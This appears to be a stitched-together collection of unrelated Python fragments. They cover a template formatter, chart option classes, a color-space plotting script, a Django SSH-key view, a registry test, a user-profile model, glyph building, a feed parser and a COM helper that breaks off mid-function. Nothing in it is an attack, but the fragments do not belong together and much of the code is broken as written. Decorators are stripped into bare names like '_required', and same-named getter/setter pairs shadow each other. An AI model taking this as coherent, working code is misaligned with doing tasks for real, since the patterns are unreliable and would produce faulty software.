        extractions: Formatter.Extractions = {}
        for match in matches:
            groups = match.groupdict()
            # Placeholder name comes from either ${braced} or $named.
            identifier = (groups['braced'] or groups['named'])
            if (identifier is None):
                continue
            identifier_parts = [identifier]
            parameters = {}
            if (groups['parameters'] is not None):
                # Split the parameter list on unescaped ',', then each
                # entry on unescaped '='; valueless params become True.
                parameters = [p.lstrip() for p in re.split('(?<!\\\\),', groups['parameters'])]
                parameters = [(re.split('(?<!\\\\)=', p, 1) + [True])[:2] for p in parameters]
                parameters = dict(parameters)
                for p in parameters:
                    argument = parameters[p]
                    if (not isinstance(argument, bool)):
                        # Unescape characters that had to be escaped
                        # inside the parameter list.
                        argument = argument.replace('\\,', ',')
                        argument = argument.replace('\\}', '}')
                        argument = argument.replace('\\=', '=')
                        parameters[p] = argument
                identifier_parts += [groups['parameters']]
            # Key retains the raw parameter text so identical names with
            # different parameters stay distinct.
            extractions[':'.join(identifier_parts)] = (identifier, parameters)
        return extractions

    def format(self, *args):
        """Apply registered substitutions and render the template.

        Callable substitutes receive *args plus the placeholder's
        remaining parameters; 'prefix', 'suffix', 'pad' and 'padstring'
        are consumed here and not forwarded.
        """
        extractions = self.extract()
        substitutions = {}
        for (needle, (identifier, parameters)) in extractions.items():
            substitute = None
            # Prefer a fully-parameterised key over the bare identifier.
            if (needle in self._substitutions):
                substitute = self._substitutions[needle]
            elif (identifier in self._substitutions):
                substitute = self._substitutions[identifier]
            if (substitute is not None):
                prefix = parameters.pop('prefix', '')
                suffix = parameters.pop('suffix', '')
                pad = int(parameters.pop('pad', 0))
                padstring = parameters.pop('padstring', '')
                if callable(substitute):
                    substitute = substitute(*args, **parameters)
                if ((pad > 0) and padstring):
                    # Left-pad the value to `pad` characters by
                    # repeating padstring and trimming.
                    pad = max(0, (pad - len(substitute)))
                    padcount = ((pad // len(padstring)) + 1)
                    padstring = (padcount * padstring)
                    padstring = padstring[0:pad]
                    substitute = ('%s%s' % (padstring, substitute))
                if substitute:
                    # Prefix/suffix only wrap non-empty values.
                    substitute = ('%s%s%s' % (prefix, substitute, suffix))
                substitutions[needle] = substitute
        return self._template.safe_substitute(substitutions)
class OptionPlotoptionsXrangeTooltipDatetimelabelformats(Options):
    """Default strftime-style tooltip label formats per datetime unit.

    NOTE(review): same-named getter/setter defs — the property
    decorators appear stripped during extraction; confirm.
    """
    def day(self):
        return self._config_get('%A, %e %b %Y')
    def day(self, text: str):
        self._config(text, js_type=False)
    def hour(self):
        return self._config_get('%A, %e %b, %H:%M')
    def hour(self, text: str):
        self._config(text, js_type=False)
    def millisecond(self):
        # %L is Highcharts' milliseconds extension.
        return self._config_get('%A, %e %b, %H:%M:%S.%L')
    def millisecond(self, text: str):
        self._config(text, js_type=False)
    def minute(self):
        return self._config_get('%A, %e %b, %H:%M')
    def minute(self, text: str):
        self._config(text, js_type=False)
    def month(self):
        return self._config_get('%B %Y')
    def month(self, text: str):
        self._config(text, js_type=False)
    def second(self):
        return self._config_get('%A, %e %b, %H:%M:%S')
    def second(self, text: str):
        self._config(text, js_type=False)
    def week(self):
        return self._config_get('Week from %A, %e %b %Y')
    def week(self, text: str):
        self._config(text, js_type=False)
    def year(self):
        return self._config_get('%Y')
    def year(self, text: str):
        self._config(text, js_type=False)
def run(space, spline, tuning, mirror, res, dump):
    """Fit and plot the achromatic (gray-axis) response for a color space.

    Samples the sRGB gray ramp, converts each sample to `space` in LCh
    form, fits/evaluates the achromatic spline, reports the worst over-
    and under-estimation of chroma, and plots measured vs. calculated
    points.

    :param space: target color space name.
    :param spline: spline type forwarded to the Achromatic fitter.
    :param tuning: iterable of colon-separated strings; the first three
        fields parse as ints, the rest as floats.
    :param mirror: mirror flag forwarded to the fitter.
    :param res: number of samples along the gray ramp.
    :param dump: when True, print the fitted spline data at the end.
    :returns: 0 (process exit code).
    """
    tune = [[(int(i) if (e < 3) else float(i)) for (e, i) in enumerate(x.split(':'))] for x in tuning]

    class Achroma(Achromatic):
        # Indexes of L, C, h in the converted coordinate tuple.
        L_IDX = 0
        C_IDX = 1
        H_IDX = 2

        def convert(self, coords, **kwargs):
            # sRGB -> target space, then rectangular a/b -> polar C/h.
            lab = Color('srgb', coords).convert(space)
            l = lab[0]
            (c, h) = alg.rect_to_polar(*lab[1:(- 1)])
            return (l, c, h)

    test = Achroma(spline=spline, mirror=mirror)
    test.calc_achromatic_response(tune)
    color = Color('srgb', [0, 0, 0])
    points1 = {}
    points2 = {}
    diff_over = 0
    diff_under = 0
    min_h = math.inf
    max_h = (- math.inf)
    max_c = 0
    first = False
    # Walk the gray ramp and compare measured chroma with the spline.
    for i in range((res + 1)):
        div = (res / 5)
        v = (i / div)
        if (v < 0.001):
            # Skip near-black samples.
            continue
        color.update('srgb', [v, v, v])
        lab = color.convert(space, norm=False)
        l = lab[0]
        (c, h) = alg.rect_to_polar(*lab[1:(- 1)])
        if (not first):
            # Report the first usable sample once.
            print('Starting L: ', l)
            print('Starting C: ', c)
            first = True
        if (c > max_c):
            max_c = c
        if (h < min_h):
            min_h = h
        if (h > max_h):
            max_h = h
        domain = test.scale(l)
        calc = test.spline(domain)
        # Track the worst over-/under-estimation of chroma.
        delta = (calc[1] - c)
        if ((delta >= 0) and (delta > diff_over)):
            diff_over = delta
        if ((delta < 0) and (abs(delta) > diff_under)):
            diff_under = abs(delta)
        points1[l] = (c, h)
        points2[calc[0]] = (calc[1], calc[2])
    print('Delta Over: ', diff_over)
    print('Delta Under: ', diff_under)
    print('Max C: ', max_c)
    print('Hue (low/high) : {} / {}'.format(min_h, max_h))
    print('Data Points: ', test.spline.length)
    # Sort measured (1) and calculated (2) points by L for plotting.
    l1 = []
    l2 = []
    c1 = []
    c2 = []
    h1 = []
    h2 = []
    for l in sorted(points1):
        l1.append(l)
        c1.append(points1[l][0])
        h1.append(points1[l][1])
    for l in sorted(points2):
        l2.append(l)
        c2.append(points2[l][0])
        h2.append(points2[l][1])
    figure = plt.figure()
    ax = plt.axes(projection='3d', xlabel='C', ylabel='h', zlabel='L')
    ax.set_title('LCh: Delta (over/under) = {:.5g}/{:.5g} - Max C = {:.5g}'.format(diff_over, diff_under, max_c))
    figure.add_axes(ax)
    plt.style.use('seaborn-v0_8-whitegrid')
    # Measured points in black; spline-calculated points in red.
    plt.plot(c1, l1, '.', color='black')
    plt.plot(c2, l2, '.', color='red', markersize=0.5)
    plt.show()
    if dump:
        print('===== Data =====')
        print(test.dump())
    return 0
# NOTE(review): the three bare names below look like view decorators
# (e.g. @login_required / @require_POST) whose '@...' prefix was lost
# in extraction — as written they are no-op expressions (or NameErrors
# at import). Confirm against the original module.
_required
_required
_POST
def sshkey(request, action):
    """Add or delete one of the current user's SSH keys.

    :param request: Django request; POST data drives the forms.
    :param action: 'add' or 'delete'.
    :returns: redirect to 'profile' on success, otherwise the rendered
        key form ('add') or key list ('delete') template.
    """
    if (action == 'add'):
        sform = SSHKeyForm(request, None, request.POST)
        if sform.is_valid():
            # 201 Created means the backing API stored the key.
            status = sform.save(action='create', args=(request.user.username, sform.cleaned_data['name']))
            if (status == 201):
                messages.success(request, _('SSH key was successfully saved'))
                return redirect('profile')
        # Invalid form or non-201 status: redisplay the form.
        return render(request, 'gui/profile/profile_sshkey_form.html', {'user': request.user, 'sform': sform}, status=200)
    elif (action == 'delete'):
        res = SSHKeyForm.api_call('delete', None, request, args=(request.user.username, request.POST.get('name')))
        status = res.status_code
        if (status == 200):
            messages.success(request, _('SSH key was successfully removed'))
            return redirect('profile')
        # Deletion failed: show the key list with the API's status code.
        return render(request, 'gui/profile/profile_sshkey_list.html', {'user': request.user, 'ssh_keys': request.user.usersshkey_set.all().order_by('id')}, status=status)
def test_registry_releases_properly(empty_sol_registry):
    """Two releases must round-trip (name, version, manifest URI)
    through the registry fixture."""
    release_id_1 = empty_sol_registry._release('package', '1.0.0', 'ipfs://Qme4otpS88NV8yQi8TfTP89EsQC5bko3F5N1yhRoi6cwGV')
    release_id_2 = empty_sol_registry._release('package1', '1.0.1', 'ipfs://Qme4otpS88NV8yQi8TfTP89EsQC5bko3F5N1yhRoi6cwGZ')
    release_data_1 = empty_sol_registry._get_release_data(release_id_1)
    release_data_2 = empty_sol_registry._get_release_data(release_id_2)
    # Release-data tuple layout: (package name, version, manifest URI).
    assert (release_data_1[0] == 'package')
    assert (release_data_1[1] == '1.0.0')
    assert (release_data_1[2] == 'ipfs://Qme4otpS88NV8yQi8TfTP89EsQC5bko3F5N1yhRoi6cwGV')
    assert (release_data_2[0] == 'package1')
    assert (release_data_2[1] == '1.0.1')
    assert (release_data_2[2] == 'ipfs://Qme4otpS88NV8yQi8TfTP89EsQC5bko3F5N1yhRoi6cwGZ')
class OptionsSelection(Options):
    """Selection-related component options.

    NOTE(review): same-named getter/setter defs — the property
    decorators appear stripped during extraction (see the sibling
    Option classes); confirm.
    """
    def enabled(self):
        return self._config_get(None)
    def enabled(self, val: bool):
        self._config(val)
    def grouped(self):
        return self._config_get(False)
    def grouped(self, val):
        self._config(val)
    def multiple(self):
        return self._config_get(None)
    def multiple(self, flag: bool):
        self._config(flag)
    def draggable(self):
        return self._config_get(None)
    def draggable(self, val: bool):
        self._config(val)
    def isselectable(self, js_funcs: etypes.JS_FUNCS_TYPES, profile: etypes.PROFILE_TYPE=None):
        # NOTE(review): unimplemented stub (bare pass) — confirm whether
        # this is intentional or awaiting implementation.
        pass
def get_thread_ts_from_dynamodb(cfg: Config, event: dict, dynamodb_client) -> (str | None):
    """Return the Slack thread timestamp recorded for a similar event.

    Hashes the event's user identity and event name, looks the hash up
    in DynamoDB, and returns the stored ``thread_ts`` string — or None
    when the event can't be hashed or no similar event was recorded.
    """
    identity_hash = hash_user_identity_and_event_name(event)
    if not identity_hash:
        return None
    record = check_dynamodb_for_similar_events(hash_value=identity_hash, dynamodb_client=dynamodb_client, cfg=cfg)
    # DynamoDB items wrap values with a type key; 'S' is the string value.
    return record['thread_ts']['S'] if record else None
class UserProfile(models.Model):
    """Extended profile data attached one-to-one to a Django User."""
    # NOTE(review): OneToOneField without on_delete — required on
    # Django >= 2.0 (implicit CASCADE before that); confirm the target
    # Django version.
    user = models.OneToOneField(User, related_name='profile')
    updated = models.DateTimeField(auto_now=True)
    # Profile image is normalized to 300x300 JPEG; a 150x150 thumbnail
    # is derived from the stored image.
    image = ProcessedImageField(upload_to=profile_img_upload_to, processors=[ResizeToFill(300, 300)], format='JPEG', options={'quality': 90})
    image_thumb = ImageSpecField(source='image', processors=[ResizeToFill(150, 150)], format='JPEG', options={'quality': 90})
    bio = models.TextField('About you', blank=True, null=True)
    links = models.TextField(help_text='Comma-separated', blank=True, null=True)
    phone = models.CharField('Phone Number', max_length=20, blank=True, null=True, help_text=('Optional. Most locations operate primarily by email, but a phone number can be helpful for last ' + 'minute coordination and the unexpected.'))
    projects = models.TextField(verbose_name='Current Projects', help_text='Describe one or more projects you are currently working on')
    sharing = models.TextField(help_text="Is there anything you'd be interested in learning or sharing during your stay?")
    discussion = models.TextField(help_text=("We like discussing thorny issues with each other. What's a question that's been on your mind lately " + "that you don't know the answer to?"))
    referral = models.CharField(max_length=200, help_text='How did you hear about us? (Give a name if possible!)')
    city = models.CharField(max_length=200, verbose_name='City', help_text='In what city are you primarily based?')
    # Payment-provider linkage (customer id plus card last-4 on file).
    customer_id = models.CharField(max_length=200, blank=True, null=True)
    last4 = models.IntegerField(null=True, blank=True, help_text="Last 4 digits of the user's card on file, if any")
    primary_accounts = models.ManyToManyField(Account, help_text='one for each currency', related_name='primary_for', blank=True)

    def __str__(self):
        return str(self.user)

    def get_or_create_primary_account(self, currency):
        """Return this user's primary account for `currency`, creating
        and registering one if none exists yet."""
        logger.debug('checking for primary account...')
        primary = self.primary_accounts.filter(currency=currency).first()
        if primary:
            logger.debug(('found: %s (id %d)' % (primary, primary.id)))
        if (not primary):
            primary = Account(currency=currency, name=('%s %s Account (primary)' % (self.user.first_name, currency.name)))
            primary.save()
            primary.owners.add(self.user)
            logger.debug('saving new primary account')
            logger.debug(primary.id)
            self.primary_accounts.add(primary)
        return primary

    def _has_primary_drft_account(self):
        # Existence check only — does not create an account.
        return self.primary_accounts.filter(currency=Currency.objects.get(name='DRFT')).first()

    def primary_drft_account(self):
        """Primary DRFT-currency account (created on demand)."""
        return self.get_or_create_primary_account(currency=Currency.objects.get(name='DRFT'))

    def drft_spending_balance(self):
        """Balance of the (possibly newly created) primary DRFT account."""
        account = self.get_or_create_primary_account(currency=Currency.objects.get(name='DRFT'))
        return account.get_balance()

    def accounts(self):
        """All accounts the user owns or administers."""
        return (list(self.user.accounts_owned.all()) + list(self.user.accounts_administered.all()))

    def accounts_in_currency(self, currency):
        """Owned plus administered accounts restricted to `currency`."""
        return (list(self.user.accounts_owned.filter(currency=currency)) + list(self.user.accounts_administered.filter(currency=currency)))
def build_interpolatable_glyphs(contours, *transforms):
    """Build a base glyph from ``contours`` plus one transformed copy per transform.

    contours: sequence of contours, each a sequence of ``((x, y), flag)`` pairs.
    transforms: 6-tuples ``(xx, xy, yx, yy, dx, dy)``; each produces a deep copy
    of the base glyph with its coordinates transformed by the 2x2 matrix and
    translated by ``(dx, dy)``. All returned glyphs share point structure, so
    they are interpolation-compatible.

    Returns a list ``[base_glyph, transformed_glyph, ...]``.
    """
    from itertools import accumulate  # local import: file's import block is out of view

    base = Glyph()
    base.numberOfContours = len(contours)
    base.coordinates = GlyphCoordinates([pt for contour in contours for (pt, _flag) in contour])
    base.flags = array.array('B', [flag for contour in contours for (_pt, flag) in contour])
    # Running totals of points per contour give each contour's last point index
    # in O(n); the original recomputed the prefix sum for every contour (O(n^2)).
    base.endPtsOfContours = [total - 1 for total in accumulate(len(c) for c in contours)]
    result = [base]
    for t in transforms:
        glyph = deepcopy(base)
        glyph.coordinates.transform((t[0:2], t[2:4]))
        glyph.coordinates.translate(t[4:6])
        result.append(glyph)
    return result
class AttendeeRegistrationByCollaboratorForm(forms.ModelForm):
    """Form used by event collaborators to register an attendee.

    ``event`` and ``registration_date`` are pre-filled by the view and hidden
    from the collaborator; ``additional_info`` is rendered as a single-line
    input rather than the model's default textarea.
    """
    class Meta():
        model = Attendee
        fields = ['first_name', 'last_name', 'nickname', 'email', 'additional_info', 'is_installing', 'event', 'registration_date']
        widgets = {'event': forms.HiddenInput(), 'registration_date': forms.HiddenInput(), 'additional_info': forms.TextInput()}
def extractTheWorldOnTheOtherSide(item):
    """Map a feed item from this group onto a release message.

    Returns ``None`` for items with no chapter/volume/fragment info or preview
    posts, a release message when a known tag or title pattern matches, and
    ``False`` when nothing matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    title_lower = item['title'].lower()
    if not (chp or vol or frag) or 'preview' in title_lower:
        return None
    # Known series, matched by feed tag.
    tag_rules = [
        ('Drop!! ~A Tale of the Fragrance Princess~', 'Drop!! ~A Tale of the Fragrance Princess~', 'translated'),
        ("I'll Live My Second Life!", "I'll Live My Second Life!", 'translated'),
    ]
    for tag, series, tl_type in tag_rules:
        if tag in item['tags']:
            return buildReleaseMessageWithType(item, series, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    # Fallback: match on a substring of the post title.
    title_rules = [('Second Life! Chapter', "I'll Live My Second Life!", 'translated')]
    for fragment, series, tl_type in title_rules:
        if fragment.lower() in title_lower:
            return buildReleaseMessageWithType(item, series, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class LegalEntityNameGenerator2():
    """Generate globally unique legal-entity names from Markov models.

    Names are drawn from ``CompanyNameMarkov`` using per-SIC / per-client-type
    configuration, decorated with postfixes and an optional country-specific
    suffix, and deduplicated against the module-level ``NAMES`` registry.
    """
    # Shared RNG so generated output is reproducible for a fixed seed.
    random_state: numpy.random.RandomState
    # NOTE(review): class-level mutable dict; appears unused in this class — confirm.
    sic = {}

    def __init__(self, randomstate):
        self.random_state = randomstate
        self.namer = CompanyNameMarkov(self.random_state)

    def make(self, sic, country_code=None):
        """Create a name for the given SIC classification."""
        config = SIC[sic.code]
        return self.create_name(config, country_code)

    def make_clienttype(self, client_type, country_code=None):
        """Create a name for one of the configured client types."""
        client_types = CLIENT_TYPES[client_type]
        config = self.random_state.choice(client_types)
        return self.create_name(config, country_code)

    def create_name(self, config, country_code):
        """Generate a unique name for ``config``; retry until unused.

        Raises nothing but loops until a name not in ``NAMES`` is produced.
        """
        while True:
            model = config['models'][0]
            full_name = self.namer.make(model)
            for group in config['postfixes']:
                choice = self.random_state.choice(group)
                if len(choice) > 1:
                    full_name = full_name.strip()
                # BUG FIX: append the postfix we just sampled. The original
                # drew a SECOND, independent sample from the group here, so
                # the length check above could apply to a different string
                # than the one actually appended.
                full_name = full_name + ' ' + choice
            v = full_name.strip()
            if v not in NAMES:
                NAMES.append(v)
                if country_code:
                    suffix = SUFFIC_GENERATOR.make(country_code)
                    return f'{v} {suffix}'
                return v
class OptionsLayer(OptChart.OptionsChart):
    """Vega-Lite layer options (auto-generated getter/setter style).

    NOTE(review): each option appears as two same-named ``def``s (a getter and
    a setter); the originals were almost certainly ``@property`` /
    ``@name.setter`` pairs whose decorators were stripped in extraction — as
    written, the second definition shadows the first. Kept byte-identical.
    """
    def description(self):
        return self._config_get()
    def description(self, text):
        self._config(text)
    def width(self):
        return self._config_get()
    def width(self, num):
        self._config(num)
    def height(self):
        return self._config_get()
    def height(self, num):
        self._config(num)
    def padding(self):
        return self._config_get()
    def padding(self, num):
        self._config(num)
    def autosize(self):
        return self._config_get()
    def autosize(self, text):
        self._config(text)
    def data(self):
        # Sub-configuration objects: lazily created typed wrappers.
        return self._config_sub_data('data', OptData)
    def spec(self):
        return self._config_sub_data('spec', OptSpec)
    def repeat(self):
        return self._config_sub_data('repeat', OptRepeat)
    def parent_width(self, percent):
        # Width as a percentage of the parent DOM component's inner width,
        # computed client-side (hence js_type=True: the value is a JS expression).
        self._config(('%s / 100 * (function(component){return component.clientWidth - (parseFloat(component.style.paddingLeft || 0) + parseFloat(component.style.paddingRight || 0)) })(%s)' % (percent, self.component.dom.varId)), name='width', js_type=True)
    def mark(self):
        return self._config_get()
    def mark(self, value):
        self._config(value)
    def marks(self):
        return EnumMarks(self, 'mark')
    def encoding(self):
        return self._config_sub_data('encoding', OptEncoding)
    def add_projection(self, name):
        # Append a named projection entry and return it for further configuration.
        scale = self._config_sub_data_enum('projection', OptProjection)
        scale.name = name
        return scale
    def add_scale(self, name, range=None):
        scale = self._config_sub_data_enum('scales', OptScale)
        scale.name = name
        if (range is not None):
            scale.range = range
        return scale
    def add_axe(self, scale, orient):
        s = self._config_sub_data_enum('axes', OptAxe)
        s.scale = scale
        s.orient = orient
        return s
    def add_legend(self, kind, title=None):
        s = self._config_sub_data_enum('legends', OptLegend)
        s.type = kind
        if (title is not None):
            s.title = title
        return s
    def add_signal(self, name, value=None):
        s = self._config_sub_data_enum('signals', OptSignal)
        s.name = name
        s.value = value
        return s
    def add_mark(self, kind):
        s = self._config_sub_data_enum('mark', OptMark)
        s.type = kind
        return s
    def add_layer(self):
        # Layers nest recursively: a sub-layer has the same option surface.
        s = self._config_sub_data_enum('layer', OptionsLayer)
        return s
class OptionSeriesItem(Options):
    """Highcharts per-series options (auto-generated getter/setter style).

    NOTE(review): every scalar option appears as two same-named ``def``s — a
    getter returning ``self._config_get(<Highcharts default>)`` and a setter
    calling ``self._config(value, js_type=False)``. The originals were almost
    certainly ``@property`` / ``@name.setter`` pairs whose decorators were
    stripped in extraction. Sub-option groups are exposed via
    ``_config_sub_data``. Kept byte-identical.
    """
    def accessibility(self) -> 'OptionSeriesItemAccessibility':
        return self._config_sub_data('accessibility', OptionSeriesItemAccessibility)
    def allowPointSelect(self):
        return self._config_get(False)
    def allowPointSelect(self, flag: bool):
        self._config(flag, js_type=False)
    def animation(self):
        return self._config_get(True)
    def animation(self, flag: bool):
        self._config(flag, js_type=False)
    def animationLimit(self):
        return self._config_get(None)
    def animationLimit(self, num: float):
        self._config(num, js_type=False)
    def borderRadius(self):
        return self._config_get(3)
    def borderRadius(self, num: float):
        self._config(num, js_type=False)
    def center(self):
        # NOTE(review): ``null`` is not a Python builtin — presumably defined
        # in this module to mirror the JS default ``[null, null]``; confirm.
        return self._config_get([null, null])
    def center(self, value: Any):
        self._config(value, js_type=False)
    def className(self):
        return self._config_get(None)
    def className(self, text: str):
        self._config(text, js_type=False)
    def clip(self):
        return self._config_get(False)
    def clip(self, flag: bool):
        self._config(flag, js_type=False)
    def color(self):
        return self._config_get('#cccccc')
    def color(self, text: str):
        self._config(text, js_type=False)
    def colorAxis(self):
        return self._config_get(0)
    def colorAxis(self, num: float):
        self._config(num, js_type=False)
    def colorIndex(self):
        return self._config_get(None)
    def colorIndex(self, num: float):
        self._config(num, js_type=False)
    def colorKey(self):
        return self._config_get('y')
    def colorKey(self, text: str):
        self._config(text, js_type=False)
    def colors(self):
        return self._config_get(None)
    def colors(self, value: Any):
        self._config(value, js_type=False)
    def connectEnds(self):
        return self._config_get(None)
    def connectEnds(self, flag: bool):
        self._config(flag, js_type=False)
    def connectNulls(self):
        return self._config_get(False)
    def connectNulls(self, flag: bool):
        self._config(flag, js_type=False)
    def crisp(self):
        return self._config_get(False)
    def crisp(self, flag: bool):
        self._config(flag, js_type=False)
    def cropThreshold(self):
        return self._config_get(300)
    def cropThreshold(self, num: float):
        self._config(num, js_type=False)
    def cursor(self):
        return self._config_get(None)
    def cursor(self, text: str):
        self._config(text, js_type=False)
    def custom(self):
        return self._config_get(None)
    def custom(self, value: Any):
        self._config(value, js_type=False)
    def dashStyle(self):
        return self._config_get('Solid')
    def dashStyle(self, text: str):
        self._config(text, js_type=False)
    def data(self) -> 'OptionSeriesItemData':
        return self._config_sub_data('data', OptionSeriesItemData)
    def dataLabels(self) -> 'OptionSeriesItemDatalabels':
        return self._config_sub_data('dataLabels', OptionSeriesItemDatalabels)
    def description(self):
        return self._config_get(None)
    def description(self, text: str):
        self._config(text, js_type=False)
    def dragDrop(self) -> 'OptionSeriesItemDragdrop':
        return self._config_sub_data('dragDrop', OptionSeriesItemDragdrop)
    def enableMouseTracking(self):
        return self._config_get(True)
    def enableMouseTracking(self, flag: bool):
        self._config(flag, js_type=False)
    def endAngle(self):
        return self._config_get('undefined')
    def endAngle(self, value: Any):
        self._config(value, js_type=False)
    def events(self) -> 'OptionSeriesItemEvents':
        return self._config_sub_data('events', OptionSeriesItemEvents)
    def fillColor(self):
        return self._config_get('undefined')
    def fillColor(self, text: str):
        self._config(text, js_type=False)
    def findNearestPointBy(self):
        return self._config_get('x')
    def findNearestPointBy(self, text: str):
        self._config(text, js_type=False)
    def getExtremesFromAll(self):
        return self._config_get(False)
    def getExtremesFromAll(self, flag: bool):
        self._config(flag, js_type=False)
    def id(self):
        return self._config_get(None)
    def id(self, text: str):
        self._config(text, js_type=False)
    def ignoreHiddenPoint(self):
        return self._config_get(True)
    def ignoreHiddenPoint(self, flag: bool):
        self._config(flag, js_type=False)
    def inactiveOtherPoints(self):
        return self._config_get(True)
    def inactiveOtherPoints(self, flag: bool):
        self._config(flag, js_type=False)
    def includeInDataExport(self):
        return self._config_get(None)
    def includeInDataExport(self, flag: bool):
        self._config(flag, js_type=False)
    def index(self):
        return self._config_get(None)
    def index(self, num: float):
        self._config(num, js_type=False)
    def innerSize(self):
        return self._config_get('40%')
    def innerSize(self, text: str):
        self._config(text, js_type=False)
    def itemPadding(self):
        return self._config_get(0.1)
    def itemPadding(self, num: float):
        self._config(num, js_type=False)
    def keys(self):
        return self._config_get(None)
    def keys(self, value: Any):
        self._config(value, js_type=False)
    def label(self) -> 'OptionSeriesItemLabel':
        return self._config_sub_data('label', OptionSeriesItemLabel)
    def layout(self):
        return self._config_get('vertical')
    def layout(self, text: str):
        self._config(text, js_type=False)
    def legendIndex(self):
        return self._config_get(None)
    def legendIndex(self, num: float):
        self._config(num, js_type=False)
    def legendSymbol(self):
        return self._config_get('rectangle')
    def legendSymbol(self, text: str):
        self._config(text, js_type=False)
    def linecap(self):
        # NOTE(review): this passes the *builtin* ``round`` as the default;
        # the Highcharts default is the string 'round' — likely a generator
        # artifact. Kept as-is; confirm before relying on the default.
        return self._config_get(round)
    def linecap(self, value: Any):
        self._config(value, js_type=False)
    def lineWidth(self):
        return self._config_get(2)
    def lineWidth(self, num: float):
        self._config(num, js_type=False)
    def linkedTo(self):
        return self._config_get(None)
    def linkedTo(self, text: str):
        self._config(text, js_type=False)
    def marker(self) -> 'OptionSeriesItemMarker':
        return self._config_sub_data('marker', OptionSeriesItemMarker)
    def minSize(self):
        return self._config_get(80)
    def minSize(self, num: float):
        self._config(num, js_type=False)
    def name(self):
        return self._config_get(None)
    def name(self, text: str):
        self._config(text, js_type=False)
    def negativeColor(self):
        return self._config_get(None)
    def negativeColor(self, text: str):
        self._config(text, js_type=False)
    def onPoint(self) -> 'OptionSeriesItemOnpoint':
        return self._config_sub_data('onPoint', OptionSeriesItemOnpoint)
    def opacity(self):
        return self._config_get(1)
    def opacity(self, num: float):
        self._config(num, js_type=False)
    def point(self) -> 'OptionSeriesItemPoint':
        return self._config_sub_data('point', OptionSeriesItemPoint)
    def pointDescriptionFormat(self):
        return self._config_get(None)
    def pointDescriptionFormat(self, value: Any):
        self._config(value, js_type=False)
    def pointDescriptionFormatter(self):
        return self._config_get(None)
    def pointDescriptionFormatter(self, value: Any):
        self._config(value, js_type=False)
    def pointInterval(self):
        return self._config_get(1)
    def pointInterval(self, num: float):
        self._config(num, js_type=False)
    def pointIntervalUnit(self):
        return self._config_get(None)
    def pointIntervalUnit(self, value: Any):
        self._config(value, js_type=False)
    def pointPlacement(self):
        return self._config_get(None)
    def pointPlacement(self, text: str):
        self._config(text, js_type=False)
    def pointStart(self):
        return self._config_get(0)
    def pointStart(self, num: float):
        self._config(num, js_type=False)
    def relativeXValue(self):
        return self._config_get(False)
    def relativeXValue(self, flag: bool):
        self._config(flag, js_type=False)
    def rows(self):
        return self._config_get('undefined')
    def rows(self, num: float):
        self._config(num, js_type=False)
    def selected(self):
        return self._config_get(False)
    def selected(self, flag: bool):
        self._config(flag, js_type=False)
    def shadow(self):
        return self._config_get(False)
    def shadow(self, flag: bool):
        self._config(flag, js_type=False)
    def showCheckbox(self):
        return self._config_get(False)
    def showCheckbox(self, flag: bool):
        self._config(flag, js_type=False)
    def showInLegend(self):
        return self._config_get(True)
    def showInLegend(self, flag: bool):
        self._config(flag, js_type=False)
    def size(self):
        return self._config_get(None)
    def size(self, num: float):
        self._config(num, js_type=False)
    def skipKeyboardNavigation(self):
        return self._config_get(None)
    def skipKeyboardNavigation(self, flag: bool):
        self._config(flag, js_type=False)
    def softThreshold(self):
        return self._config_get(True)
    def softThreshold(self, flag: bool):
        self._config(flag, js_type=False)
    def sonification(self) -> 'OptionSeriesItemSonification':
        return self._config_sub_data('sonification', OptionSeriesItemSonification)
    def stacking(self):
        return self._config_get(None)
    def stacking(self, text: str):
        self._config(text, js_type=False)
    def startAngle(self):
        return self._config_get('undefined')
    def startAngle(self, value: Any):
        self._config(value, js_type=False)
    def states(self) -> 'OptionSeriesItemStates':
        return self._config_sub_data('states', OptionSeriesItemStates)
    def step(self):
        return self._config_get(None)
    def step(self, value: Any):
        self._config(value, js_type=False)
    def stickyTracking(self):
        return self._config_get(False)
    def stickyTracking(self, flag: bool):
        self._config(flag, js_type=False)
    def thickness(self):
        return self._config_get('undefined')
    def thickness(self, num: float):
        self._config(num, js_type=False)
    def threshold(self):
        return self._config_get(0)
    def threshold(self, num: float):
        self._config(num, js_type=False)
    def tooltip(self) -> 'OptionSeriesItemTooltip':
        return self._config_sub_data('tooltip', OptionSeriesItemTooltip)
    def turboThreshold(self):
        return self._config_get(1000)
    def turboThreshold(self, num: float):
        self._config(num, js_type=False)
    def type(self):
        return self._config_get(None)
    def type(self, text: str):
        self._config(text, js_type=False)
    def visible(self):
        return self._config_get(True)
    def visible(self, flag: bool):
        self._config(flag, js_type=False)
    def zIndex(self):
        return self._config_get(None)
    def zIndex(self, num: float):
        self._config(num, js_type=False)
    def zoneAxis(self):
        return self._config_get('y')
    def zoneAxis(self, text: str):
        self._config(text, js_type=False)
    def zones(self) -> 'OptionSeriesItemZones':
        return self._config_sub_data('zones', OptionSeriesItemZones)
class TASViewSet(APIView):
    """Filter-tree endpoint for Treasury Account Symbols (TAS)."""
    endpoint_doc = 'usaspending_api/api_contracts/contracts/v2/references/filter_tree/tas.md'
    def _parse_and_validate(self, request):
        """Validate query params via TinyShield: optional int ``depth`` (default 0)
        and optional search text ``filter`` (default None)."""
        models = [{'key': 'depth', 'name': 'depth', 'type': 'integer', 'allow_nulls': True, 'default': 0, 'optional': True}, {'key': 'filter', 'name': 'filter', 'type': 'text', 'text_type': 'search', 'allow_nulls': True, 'optional': True, 'default': None}]
        return TinyShield(models).block(request)
    # NOTE(review): bare call below looks like a stripped decorator (e.g.
    # ``@cache_response()``) applied to ``get`` — confirm against the repo.
    _response()
    def get(self, request: Request, tier1: str=None, tier2: str=None, tier3: str=None) -> Response:
        """Return filter-tree search results for up to three TAS tiers."""
        request_values = self._parse_and_validate(request.GET)
        filter_tree = TASFilterTree()
        return Response({'results': filter_tree.search(tier1, tier2, tier3, request_values['depth'], request_values['filter'])})
def CoCreateInstanceEx(clsid, interface=None, clsctx=None, machine=None, pServerInfo=None):
    """Create a COM object, optionally on a remote ``machine``.

    Defaults: local/remote server context, ``IUnknown`` interface. Exactly one
    of ``machine`` / ``pServerInfo`` may be given; a COSERVERINFO is built from
    ``machine`` when needed. Returns a typed interface pointer.

    Raises ValueError if both machine and server info are supplied.
    """
    if clsctx is None:
        clsctx = CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER
    if pServerInfo is not None and machine is not None:
